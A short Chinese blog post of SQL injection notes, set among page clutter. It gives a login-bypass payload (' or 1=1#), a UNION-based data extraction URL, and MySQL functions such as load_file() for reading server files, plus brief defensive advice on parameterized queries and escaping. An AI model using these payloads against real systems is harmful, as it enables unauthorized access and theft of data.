数据库简易攻击笔记

最新推荐文章于 2023-09-07 13:33:00 发布
最新推荐文章于 2023-09-07 13:33:00 发布
阅读量228 收藏
点赞数
分类专栏: MYSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cy198701067573/article/details/51459177
版权

一、简易登录

MYSQL数据库:

采用用户名’ or 1=1#密码随意,单引号不行就换双引号,攻击原理是利用#号把语句后面的内容注释掉

--2个横线是SQL SERVEROracle数据库的单行注释

一般防御措施,SQL SERVER采用存储过程,或者参数化查询即可

MYSQL必须对用户的输入进行转义

二、使用union 爆数据库的内容

ccc.com?id=0 union select user(),2,3

黄色底纹的为mysql内置函数

User() 显示当前数据库连接的用户

database() 显示当前数据库名称

version() 显示当前数据库版本

@@datadir 显示当前数据库保存的物理路径

load_file(‘c:\\a.txt’) 读取当前服务器任意文件


寰宇一刀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021软考数据库系统工程师笔记
11-25
2021软考数据库系统工程师笔记,自己从书上总结的。参照《数据库系统工程师第3版》《5天修炼数据库系统工程师》。祝大家考试成功。
简单的sql注入式攻击 教程(小白 )
热门推荐
有一棵枣树在庭前
04-30 1万+
SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 以下是整理网上教程所得出的,如有误,非常感谢指出
JDBC学习笔记
weixin_62978418的博客
09-07 35
根据各个帖子来整合的个人学习笔记
django学习笔记
sober30的博客
07-27 660
Django官网:https://www.djangoproject.com/Django 采用了 MVT 的软件设计模式,即模型(Model),视图(View)和模板(Template)。建议图:用户操作流程图:Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式优势:低耦合开发快捷部署方便可重用性高维护成本低。。。。。。简易图。
软件设计师笔记
~yzzheng~的博客
05-01 1627
软件设计师考试复习
数据库笔记
07-12
本文档详细的讲解了mysql数据库各个知识点,内容详尽,资源齐全。
尚硅谷数据库视频笔记总结mysql
07-11
尚硅谷数据库笔记总结
高级数据库技术课程笔记
05-25
高级数据库课程笔记,xml数据库、面向对象、数据文件组织与存储、事务并发、分布式数据库系统、大数据、数据仓库、NOSQL以及内存数据库
2024-2030全球与中国低脂凝乳奶酪市场现状及未来发展趋势.docx
04-30
2024-2030全球与中国低脂凝乳奶酪市场现状及未来发展趋势
毕业设计:vue+springboot乌鲁木齐南山冰雪旅游服务网站(源码 + 数据库 + 说明文档)
04-30
毕业设计:vue+springboot乌鲁木齐南山冰雪旅游服务网站(源码 + 数据库 + 说明文档) 2 开发工具及技术 2 2.1 B/S结构的介绍 2 2.2 JSP及SpringBoot技术的介绍 2 2.3 HTML及Vue技术的介绍 2 2.4 MYSQL数据库的介绍 3 2.5 开发环境的介绍 3 3 需求分析 4 3.1 可行性分析 4 3.2 功能需求分析 4 3.3 非功能需求分析 4 4 总体设计 6 4.1 系统总体结构设计 6 4.2 系统的数据库设计 6 5 系统功能实现 6 5.1 注册用户 6 5.2 管理员用户 6 6 系统测试 6 6.1 测试目的 6 6.2 测试内容 6 6.3 测试总结 6
C# 超简单的离线人脸识别库 ( 基于 SeetaFace6 ).zip
04-30
c
华为数字化转型实践28个精华问答.docx
04-30
华为数字化转型实践28个精华问答.docx
2024年全球二极管阵列光谱仪行业总体规模、主要企业国内外市场占有率及排名.docx
04-30
2024年全球二极管阵列光谱仪行业总体规模、主要企业国内外市场占有率及排名
基于AT89C51单片机的温度上下限自动控制检报警设计.zip-06
04-30
基于51单片机的温度检测调节系统 由STC89C51单片机+液晶1602显示+DS18B20温度传感器+继电器+报警模块构成 具体功能: 1、采用DS18B20温度传感器测温并用LCD1602显示; 2、按键为设置按键、加键和减键。可设置上下限温度控制范围; 3、当温度超过设定的上或下限时,相应的指示灯亮,同时相应的继电器吸合,继电器可以驱动负载工作; 4、温度测量范围0到99.9摄氏度,精度为0.1摄氏度。
2024年中国高量子效率传感器行业研究报告.docx
04-30
2024年中国高量子效率传感器行业研究报告
基于C++14语法的任务链.zip
04-30
基于C++14语法的任务链.zip
企业级业务架构设计方法论qy.pptx
最新发布
04-30
企业级业务架构设计方法论qy.pptx
liba2ps1-4.15.5-2.2.x86_64.rpm
04-30
liba2ps1-4.15.5-2.2.x86_64
数据库系统工程师笔记csdn
06-21
数据库系统工程师笔记csdn是一篇关于数据库系统工程师学习笔记的文章。在这篇文章中,作者通过分享自己的学习笔记,为想要从事数据库系统工程师工作的人提供了有用的参考和指导。 文章中首先介绍了数据库系统工程师...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值